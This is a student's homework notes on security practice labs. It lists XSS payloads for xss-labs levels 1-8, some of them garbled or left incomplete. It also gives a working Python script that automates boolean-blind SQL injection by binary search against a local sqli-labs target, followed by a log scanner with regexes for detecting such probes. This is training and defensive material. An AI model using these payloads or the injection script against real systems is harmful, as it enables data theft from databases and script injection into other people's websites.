Summer Vacation --- Homework 2
Learning objectives:
- xss-labs levels 1-8
- Optimize the Python code that automates boolean-based blind SQL injection (binary search)
Learning content:
1. xss-labs levels 1-8
Level 1 (rendered source):
<h2 align="center">欢迎用户test</h2>

Level 2: <script>alert(1)</script>
Rendered form source:
<center>
<form action="level2.php" method="GET">
<input name="keyword" value="test">
<input type="submit" name="submit" value="搜索">
</form>
</center>

Level 3 (rendered source):
<form action=level3.php method=GET>
<input name=keyword value='<script>alert(111)</script>'>

Level 4: same as level 3

Level 5: '<scr_ipt>alert(11)</script>">

Level 6: <a hr_ef=javascript:alert(1)> <"">

Level 7: <a =java:alert(1)> <"">

Level 8:
2. Optimize the Python code that automates boolean-based blind SQL injection (binary search)
```python
import requests

# Target URL
url = "http://127.0.0.1/sqli/Less-8/index.php"
# Database information to infer (for example the database name)
database_name = ""
# Character set (extend as needed). The ORD() comparison below is a binary search
# over code points, so the set must be sorted by code point or the search misses
# characters (the original unsorted string could not find lowercase letters).
charset = "".join(sorted("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "))


# Infer the length of the database name
def get_database_length():
    low = 1
    high = 50  # keep the original maximum-length limit
    while low <= high:
        mid = (low + high) // 2
        # Check whether the length equals mid
        payload = f"1' AND (SELECT length(database()) = {mid}) -- "
        response = requests.get(url, params={"id": payload})
        if "You are in..........." in response.text:
            return mid
        # Check whether the length is greater than mid
        payload = f"1' AND (SELECT length(database()) > {mid}) -- "
        response = requests.get(url, params={"id": payload})
        if "You are in..........." in response.text:
            low = mid + 1
        else:
            high = mid - 1
    return 0


# Infer the database name
def get_database_name(length):
    db_name = ""
    for i in range(1, length + 1):
        low = 0
        high = len(charset) - 1
        # Binary search for the character at the current position
        while low <= high:
            mid = (low + high) // 2
            mid_char = charset[mid]
            # Compare code points to narrow the candidate range
            payload = f"1' AND ORD(SUBSTRING(database(), {i}, 1)) > ORD('{mid_char}') -- "
            response = requests.get(url, params={"id": payload})
            if "You are in" in response.text:
                low = mid + 1
            else:
                high = mid - 1
        # After the loop, low is the index of the first character not less than
        # the target, i.e. the target itself when it is in the charset
        if 0 <= low < len(charset):
            db_name += charset[low]
    return db_name


# Main function: runs only when this module is executed directly
if __name__ == "__main__":
    length = get_database_length()
    if length > 0:
        print(f"Database length: {length}")
        db_name = get_database_name(length)
        print(f"Database name: {db_name}")
    else:
        print("Failed to determine database length.")
```
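From the defender's side, the binary-search probing above leaves a clear trail in the web server's access log: a burst of requests from one client whose `id` parameter carries an inference function (`length(database())`, `ORD(SUBSTRING(...))`) together with a comparison. The scanner below is an added example, not part of the original homework; the Apache combined log format, the constructed sample lines, the regexes and the threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines for this example (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2024:10:00:01 +0800] "GET /sqli/Less-8/index.php?id=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Aug/2024:10:00:02 +0800] "GET /sqli/Less-8/index.php?id=1%27+AND+%28SELECT+length%28database%28%29%29+%3E+25%29+--+ HTTP/1.1" 200 1024 "-" "python-requests/2.31"
10.0.0.9 - - [12/Aug/2024:10:00:02 +0800] "GET /sqli/Less-8/index.php?id=1%27+AND+ORD%28SUBSTRING%28database%28%29%2C+1%2C+1%29%29+%3E+ORD%28%27m%27%29+--+ HTTP/1.1" 200 1024 "-" "python-requests/2.31"
10.0.0.9 - - [12/Aug/2024:10:00:03 +0800] "GET /sqli/Less-8/index.php?id=1%27+AND+ORD%28SUBSTRING%28database%28%29%2C+1%2C+1%29%29+%3E+ORD%28%27s%27%29+--+ HTTP/1.1" 200 980 "-" "python-requests/2.31"
10.0.0.5 - - [12/Aug/2024:10:00:04 +0800] "GET /sqli/Less-8/index.php?id=2 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Apache combined format: client IP, identd, user, [time], "request line", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# A boolean-blind probe needs a function that yields a length or character of a
# hidden value, plus a comparison inside an AND/OR clause (heuristic, assumed).
INFER_RE = re.compile(r"\b(ORD|ASCII|SUBSTRING|SUBSTR|MID|LENGTH|CHAR_LENGTH)\s*\(", re.I)
CMP_RE = re.compile(r"\b(AND|OR)\b.*[<>=]", re.I | re.S)


def is_blind_probe(value):
    """True when a decoded parameter value looks like a boolean-blind inference probe."""
    return bool(INFER_RE.search(value)) and bool(CMP_RE.search(value))


def scan_log(text, threshold=2):
    """Count probe-shaped requests per client IP; return sources at or above threshold."""
    probes = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes and turns '+' back into spaces
        params = parse_qs(urlsplit(m.group("path")).query)
        if any(is_blind_probe(v) for vals in params.values() for v in vals):
            probes[m.group("ip")] += 1
    # The binary search needs several requests per character, so even a low
    # threshold separates a probing client from a single stray query.
    return {ip: n for ip, n in probes.items() if n >= threshold}


if __name__ == "__main__":
    for ip, n in scan_log(SAMPLE_LOG).items():
        print(f"{ip}: {n} blind-injection probes")
```

On the sample lines only 10.0.0.9 is reported, with three probes; the two plain `id=1` / `id=2` requests from 10.0.0.5 are ignored.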
Study time:
Study time is study time.
The content consists of notes [sometimes rather abstract, sometimes overly detailed; please forgive this. The author may be writing these only as personal notes, 筋肉人future]
Learning output:
- Technical notes, 1 pass
- If there are errors, please point them out; the author will correct them promptly